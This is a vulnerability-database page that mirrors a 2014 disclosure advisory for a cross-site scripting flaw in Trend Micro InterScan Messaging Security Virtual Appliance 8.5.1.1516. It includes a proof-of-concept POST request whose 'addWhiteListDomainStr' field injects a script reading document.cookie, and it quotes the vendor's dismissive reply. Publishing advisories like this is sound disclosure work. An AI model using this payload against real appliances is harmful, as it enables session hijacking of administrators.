Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

InterScan Messaging Security Virtual Appliance 8.5.1.1516 Cross Site Scripting

🗓️ 30 May 2014 00:00:00Reported by William CostaType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 36 Views

InterScan Messaging Security Virtual Appliance 8.5.1.1516 XSS vulnerability through "addWhiteListDomainStr" paramete

Code
`I. VULNERABILITY  
-------------------------  
  
XSS Attacks vulnerability in InterScan Messaging Security Virtual Appliance  
8.5.1.1516  
  
II. DESCRIPTION  
-------------------------  
Has been detected a XSS vulnerability in InterScan Messaging Security  
Virtual Appliance version 8.5.1.1516.  
The code injection is done through the parameter "addWhiteListDomainStr"  
send via post in the page “/addWhiteListDomain.imss”  
  
III. PROOF OF CONCEPT  
-------------------------  
The application does not validate the parameter  
“addWhiteListDomainStr” correctly.  
  
  
https://10.200.210.100:8445/addWhiteListDomain.imss  
  
Host=10.200.210.100:8445  
User-Agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0)  
Gecko/20100101 Firefox/29.0  
Accept=text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=en-US,en;q=0.5  
Accept-Encoding=gzip, deflate Referer=  
https://186.230.33.160/trend-interscan/trend.php  
Cookie=JSESSIONID=68D4F0AEF4874173BDE77FAA4895231F; CurrentLocale=en- US;  
PHPSESSID=2ok068gfak8np5isbe5k5l4nf3; un=7164ceee6266e893181da6c33936e4a4;  
userID=1; LANG=en;  
wids=modImsvaSystemUseageWidget,modImsvaMailsQueueWidget,modImsvaQuara  
ntineWidget,modImsvaArchiveWidget,; lastID=15; theme=default; lastTab=1;  
GetPageTab=1  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=95  
POSTDATA=addWhiteListDomainStr=aaaa.com"><script>alert(document.cookie  
);</script>)  
  
  
https://vimeo.com/96757096  
  
  
IV. BUSINESS IMPACT  
-------------------------  
An attacker can execute arbitrary HTML or script code in a targeted user's  
browser, that allows the execution of arbitrary HTML/script code to be  
executed in the context of the victim user's browser allowing session  
hijacking.  
  
V. SYSTEMS AFFECTED  
-------------------------  
Tested in InterScan Messaging Security Virtual Appliance 8.5.1.1516  
  
VI. SOLUTION  
------------------------  
  
Answer from Trend.  
  
Hi William,  
  
  
According to our Product Developers, this is not vulnerability of our  
product. All of the cookies(not just IMSVA) can be stolen from a  
compromised environment. It was highly suggested that you upgrade your  
client to ensure safety.  
Also, they recommended another Trend Micro Product -"OfficeScan" that may  
be suitable for your environment.  
  
I hope this information helps. Please let me know if you have additional  
questions or clarifications.  
  
Have a great day!  
  
  
  
By William Costa  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 May 2014 00:00Current
7.4High risk
Vulners AI Score7.4
xss vulnerabilityinterscan messagingsecurity virtual appliancecode injectionparameter validationcross site scriptingarbitrary html executionsession hijackingtrend micro productofficescan
36